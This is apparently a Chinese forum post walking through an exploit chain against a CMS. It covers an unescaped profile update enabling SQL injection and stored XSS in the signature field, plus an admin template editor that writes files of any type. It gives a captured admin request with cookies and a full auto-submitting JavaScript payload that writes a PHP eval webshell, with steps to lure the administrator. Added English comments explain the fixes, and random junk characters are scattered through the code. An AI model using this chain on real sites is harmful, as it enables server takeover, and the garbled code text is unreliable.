这个 CMS 以前在 90 有人发过一个 getshell，当时是后台验证文件的问题。
官网已经修补了，所以重新下了源码。
因为后台登入还需要认证码，所以注入就没看了。
存在 XSS。
漏洞文件：user/member/skin_edit.php
<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
</textarea></td></tr>
user/do.php
if($op=='zl'){ //资料: |2 a+ H: z, e
// Profile ("资料") update. $CS_QQ, $CS_Nichen, $CS_City, $CS_Email, $CS_Sex and
// $CS_Qianm all arrive from the request: the only check is empty(), after which
// each value is interpolated straight into the UPDATE statement with no
// escaping or parameter binding, so the query is injectable. The stored
// signature is later echoed raw (`<?php echo $cscms_qianm?>`) into the
// signature <textarea> in skin_edit.php, which is the stored-XSS sink: it needs
// htmlspecialchars() on output and escaping/binding here.
$missing = empty($CS_QQ) || empty($CS_Nichen) || empty($CS_City) || empty($CS_Email);
if ($missing) {
    exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
}
$userTable = Getdbname('user');
// Line breaks inside the literal are kept as in the original statement.
$sql = "update {$userTable} set CS_Nichen='{$CS_Nichen}',CS_Email='{$CS_Email}',
CS_Sex={$CS_Sex},CS_City='{$CS_City}',CS_QQ='{$CS_QQ}',CS_Qianm='{$CS_Qianm}'
 where CS_Name='{$cscms_name}'";
// Both outcomes end the request through Msg_Error(); only the message differs.
$notice = $db->query($sql) ? '恭喜您,修改成功了!' : '抱歉,修改失败了!';
exit(Msg_Error($notice, 'javascript:history.go(-1);'));
没有过滤，导致 XSS 产生。
后台看了下，很奇葩的是可以写任意格式的文件。
抓包：
POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 127.0.0.1
Content-Length: 38
DNT: 1
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594

name=aaa.php&content=%3Cs%3E%3Ca%25%3E
于是构造 JS 如下。
<script>
// The target URL is derived from the host of the page the script runs on, so
// the request goes to that site's own admin endpoint; the query string is the
// one from the captured request above. `path=../../skins/index/html/` is used
// by the server as the destination directory — it should be validated against
// the fixed template directory server side, not used verbatim.
thisTHost = top.location.hostname;/ ^% \$ P5 ?# G; {; p% s2 k0 k
4 ~- l* b, o* R6 Q, ?2 _+ J; H
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";: O7 F0 o g/ D5 y1 I% C
2 `$ ]8 Q% S& g$ l
/**
 * Creates a hidden POST form with two fields, `name` (= data) and `content`
 * (= msg), points it at `url` and submits it immediately — the same two
 * fields as the captured skins.php request above. The submission is a plain
 * form navigation, so the victim's browser attaches its existing admin
 * cookies (the request above is authenticated purely by cookie); nothing in
 * the request proves the admin intended the action. Defence belongs in
 * skins.php: a per-session CSRF token checked on every write, plus SameSite
 * cookies, would reject this form regardless of the stored XSS that delivers it.
 * @param {string} url  - form action (admin endpoint)
 * @param {string} data - value of the `name` field
 * @param {string} msg  - value of the `content` field
 */
function PostSubmit(url, data, msg) { * i- c( q* H' Y7 \* y" z
var postUrl = url;( L5 T. P* l4 q: i8 b
9 E, I" V' m, r var postData = data;
1 G7 X. @! r+ s$ s var msgData = msg; ! X5 a- Y; ?5 j# F u' O; X2 D4 a
// The form is attached to the page and submitted without any user click.
var ExportForm = document.createElement("FORM"); ! y3 p* B4 }4 A- j
document.body.appendChild(ExportForm);
6 n: m: |* M! R! p* p9 Y5 f5 j ExportForm.method = "POST"; - v" y3 i( l3 p+ n3 Y+ W0 u4 M
// Two hidden inputs: `name` and `content`, matching the server's form fields.
var newElement = document.createElement("input");
$ B9 c" c; w, H7 A1 Y newElement.setAttribute("name", "name");
1 z2 _ ?6 ?0 }$ h; }" L+ y9 J, t newElement.setAttribute("type", "hidden");
5 F) |0 z9 v4 S& ]+ N3 a& E var newElement2 = document.createElement("input");
, @; W ~) \# A newElement2.setAttribute("name", "content"); ) X" E+ a9 l j# \2 A: X
newElement2.setAttribute("type", "hidden");
/ v' \+ R+ H/ B- ?+ J) f ExportForm.appendChild(newElement);
. i3 Z2 A6 e+ S4 y, j4 ^% x5 C ExportForm.appendChild(newElement2); 4 ~/ S, K& {% R F& E! \( ^
newElement.value = postData; 9 Z i7 t& e7 _
newElement2.value = msgData; " x8 G- T( N: f: G; g( O f0 ^
ExportForm.action = postUrl; & P, `( h4 _$ w0 S* ^% u5 C% `
ExportForm.submit();
& s' g% e4 P9 M};8 W6 H- p: l$ l4 a+ ]5 M# U
// The second and third arguments become the `name` and `content` fields; per
// the note at the end of the post the server writes them out as a file under
// the directory given by `path`. Server-side fix: restrict `name` to an
// allow-list of template file names/extensions, confine `path` to the template
// directory, and require a CSRF token on the write.
S' u5 u! C+ T# s4 K% ?: MPostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");4 G; O K! H7 R7 @8 Z+ B3 W& E- x
</script>
在 http://127.0.0.1/user/space.php?ac=edit&op=zl 的修改签名处插入。
用你的账号给管理员写个私信，或者让他访问你的主页 http://127.0.0.1/home/?uid=2（uid 自己改），
就会在 skins\index\html\ 目录下生成 roker.php 一句话。